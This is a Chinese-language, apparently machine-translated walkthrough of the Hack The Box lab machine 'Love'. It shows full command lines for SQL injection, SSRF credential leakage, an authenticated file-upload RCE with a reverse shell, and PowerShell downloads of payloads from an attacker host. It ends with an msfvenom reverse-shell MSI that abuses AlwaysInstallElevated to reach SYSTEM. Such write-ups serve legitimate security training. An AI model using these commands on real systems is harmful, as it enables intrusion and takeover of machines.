共计 12931 个字符,预计需要花费 33 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责
服务探测
凋谢端口探测
┌──(root💀kali)-[~/htb/Love]
└─# nmap -p- 10.10.10.239 --open 130 ⨯
Starting Nmap 7.92 (https://nmap.org) at 2022-01-10 08:49 EST
Nmap scan report for 10.10.10.239
Host is up (0.38s latency).
Not shown: 64817 closed tcp ports (reset), 699 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5000/tcp open upnp
5040/tcp open unknown
5985/tcp open wsman
5986/tcp open wsmans
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 188.90 seconds
端口详细信息
┌──(root💀kali)-[~/htb/Love]
└─# nmap -sV -Pn -AO 10.10.10.239 -P 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670
Starting Nmap 7.92 (https://nmap.org) at 2022-01-10 08:54 EST
Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 10.10.10.239
Host is up (0.40s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Voting System using PHP
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn:
|_ http/1.1
|_http-title: 403 Forbidden
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| FourOhFourRequest, NULL, NotesRPC:
|_ Host '10.10.14.5' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=1/10%Time=61DC3ADA%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourReq
SF:uest,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(NotesRPC,49
SF:,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.5'\x20is\x20not\x20allowed\x20
SF:to\x20connect\x20to\x20this\x20MariaDB\x20server");
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (96%), Microsoft Windows Longhorn (95%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 1909 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows 8.1 Update 1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m10s, median: 21m32s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-10T14:17:58
|_ start_date: N/A
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-10T06:17:59-08:00
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 403.34 ms 10.10.14.1
2 403.58 ms 10.10.10.239
Failed to resolve "80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670".
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.82 seconds
web
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.239
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.239/_22-01-10_08-39-35.txt
Error Log: /root/dirsearch/logs/errors-22-01-10_08-39-35.log
Target: http://10.10.10.239/
[08:39:38] Starting:
[08:40:04] 301 - 337B - /ADMIN -> http://10.10.10.239/ADMIN/
[08:40:04] 301 - 337B - /Admin -> http://10.10.10.239/Admin/
[08:40:14] 301 - 337B - /admin -> http://10.10.10.239/admin/
[08:40:14] 301 - 338B - /admin. -> http://10.10.10.239/admin./
[08:40:15] 200 - 6KB - /admin/
[08:40:15] 403 - 302B - /admin/.htaccess
[08:40:15] 200 - 6KB - /admin%20/
[08:40:16] 302 - 0B - /admin/login.php -> index.php
[08:40:16] 200 - 6KB - /admin/?/login
[08:40:17] 200 - 6KB - /admin/index.php
[08:40:17] 302 - 16KB - /admin/home.php -> index.php
[08:40:37] 301 - 348B - /bower_components -> http://10.10.10.239/bower_components/
[08:40:39] 200 - 7KB - /bower_components/
[08:40:48] 200 - 1KB - /dist/
[08:40:48] 301 - 336B - /dist -> http://10.10.10.239/dist/
[08:40:57] 302 - 0B - /home.php -> index.php
[08:40:58] 301 - 338B - /images -> http://10.10.10.239/images/
[08:40:58] 200 - 2KB - /images/
[08:40:58] 503 - 402B - /examples/
[08:40:59] 200 - 4KB - /index.php
[08:41:00] 200 - 4KB - /index.pHp
[08:41:01] 200 - 4KB - /index.php/login/
[08:41:01] 200 - 4KB - /index.php.
[08:41:01] 200 - 2KB - /includes/
[08:41:01] 301 - 340B - /includes -> http://10.10.10.239/includes/
[08:41:05] 302 - 0B - /login.php -> index.php
[08:41:06] 302 - 0B - /logout.php -> index.php
[08:41:20] 301 - 339B - /plugins -> http://10.10.10.239/plugins/
[08:41:20] 200 - 2KB - /plugins/ 80 端口是一个叫 voting system 的 web app,kali 搜寻这个程序的破绽状况
┌──(root💀kali)-[~/dirsearch]
└─# searchsploit voting system 6 ⨯
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi) | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated) | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI) | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated) | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection | php/webapps/50052.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
有个未受权的 RCE,试过不行。
还有个受权的 RCE,然而我没没有登录凭据。
还有个 sql 注入,如果存在 sql 注入,那么咱们就能够拿到用户凭据,尝试受权的 RCE
尝试 sql 注入
┌──(root💀kali)-[~/htb/Love]
└─# sqlmap -r data --batch -p voter --level 5 --risk 3
___
__H__
___ ___[.]_____ ___ ___ {1.5.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:33:05 /2022-01-10/
[09:33:05] [INFO] parsing HTTP request from 'data'
[09:33:05] [INFO] resuming back-end DBMS 'mysql'
[09:33:05] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.239:80/index.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voter (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voter=admin'AND (SELECT 4771 FROM (SELECT(SLEEP(5)))YdaT) AND'Vvvd'='Vvvd&password=123&login=asd
---
[09:33:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.27, Apache 2.4.46
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:33:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.239'
[*] ending @ 09:33:08 /2022-01-10/
证实用户名 voter 字段存在基于工夫的 sql 注入
以下 payload 拿到所有数据库名字
sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T --dbs返回
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] votesystem
同样的办法,一步步测试,用上面 payload 拿到用户凭据
sqlmap -r data --batch -p voter --level 3 --risk 3 --dbms=mysql --technique=T -D votesystem -T admin -C username,password --dump
Database: votesystem
Table: admin
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$psrWULJqgpPOl4HUt.ctM.vFMYJjh65EiRFDbIAZsa3z/F3t/8zXW |
+----------+--------------------------------------------------------------+
然而用 john 和 hashcat 我都无奈爆破这个明码
vhost 爆破
把 love.htb 写进 hosts 文件echo "10.10.10.239 love.htb" >> /etc.hosts
应用 gobuster 爆破子域名
┌──(root💀kali)-[~/htb/Love]
└─# gobuster vhost -u love.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://love.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/24 00:57:35 Starting gobuster in VHOST enumeration mode
===============================================================
Found: staging.love.htb (Status: 200) [Size: 5357]
失去一个 staging.love.htb 的子域名
把这个域名增加到 hosts 文件,关上 80 端口是一个叫 free file scanner 的 web app
SSRF
在 Demo 模块,要求输出一个 url 地址,尝试本地写一个 php 文件,用 python 开启一个繁难的 web server,再拜访这个 php 文件,显示是能够拜访,然而 php 没有被执行
尝试内网拜访 80 端口:http://127.0.0.1
返回登录页面
尝试内网拜访 443 端口:http://127.0.0.1:443
返回
Bad Request
Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.尝试内网拜访 5000 端口
http://127.0.0.1:5000爆出了 admin 的明码信息
Vote Admin Creds admin: @LoveIsInTheAir!!!!
foodhold
当初咱们有了登录信息,能够利用受权的 RCE 拿 shell
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py源代码须要编辑相干信息,以及批改门路
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.3" # Reverse shell IP
REV_PORT = "4242" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
执行当前收到反弹 shell
┌──(root💀kali)-[~/htb/Love]
└─# nc -lvnp 4242 1 ⨯
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 53219
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
提权
传 winpeas 到靶机
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3/winPEASx64.exe','c:\Users\Phoebe\Downloads\winPEASx64.exe')"注册表提权
执行 winpeas 当前发现 HKLM 和 HKCU 的值都是 1
���������� Checking AlwaysInstallElevated
� https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
意味着咱们能够应用注册表提权(Registry Escalation)
编译一个反弹 shell 的 msi 文件
┌──(root💀kali)-[~/htb/Love]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4444 -f msi -o setup.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of msi file: 159744 bytes
Saved as: setup.msi传到靶机
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.3/setup.msi','c:\Users\Phoebe\Downloads\setup.msi')"执行 msi 文件
c:\Users\Phoebe\Downloads>.\setup.msi
.\setup.msi
收到反弹 shell
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.239:53222) at 2022-01-24 02:33:20 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
曾经是 SYSTEM 权限。
正文完